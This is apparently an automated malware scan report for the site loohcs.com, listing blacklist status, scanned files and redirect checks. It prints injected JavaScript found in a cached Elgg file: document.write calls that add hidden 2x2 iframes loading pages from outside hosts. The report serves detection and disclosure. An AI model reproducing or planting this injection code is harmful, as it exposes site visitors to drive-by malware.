Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=loohcs.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://loohcs.com/ | 200 OK Content-Length: 7396 Content-Type: text/html | clean |
http://loohcs.com/vendors/jquery/jquery-1.6.4.min.js | 403 Forbidden Content-Length: 355 Content-Type: text/html | clean |
http://loohcs.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://loohcs.com/vendors/jquery/jquery-ui-1.8.16.min.js | 200 OK Content-Length: 201875 Content-Type: application/javascript | clean |
http://loohcs.com/cache/js/default/elgg.1410278099.js | 200 OK Content-Length: 68289 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://pometra.com/ehes.html?j=1337692></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1337692></iframe>'); var sprintf = (function() { function get_type(variable) { return Object.prototype.toString.call(variable).slice(8, -1).t data: data, success: function(json) { var river = $('.elgg-list-river'); if (river.length < 1) { river.append(json.output); } else { river.prepend($(json.output).find('li:first')); }; form.find('textarea').val(''); $("#thewire-characters-remaining span").html("140"); } }); e.preventDefault(); }; elgg.register_hook_handler('init', 'system', elgg.river.update.init);
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://pometra.com/ehes.html?j=1337692
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://pometra.com/ehes.html?j=1337692>
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1337692
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1337692>
http://loohcs.com/javascript.js | 404 Not Found Content-Length: 330 Content-Type: text/html | clean |
http://loohcs.com/mod/business/vendors/js/jquery.sudoSlider.2.1.4.min.js | 200 OK Content-Length: 9038 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: loohcs.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 12 Sep 2014 15:24:40 GMT
Pragma: no-cache
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: Elgg=1fc2ac4e4e39046856b5071ae71039c2; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: loohcs.com
Referer: http://www.google.com/search?q=loohcs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.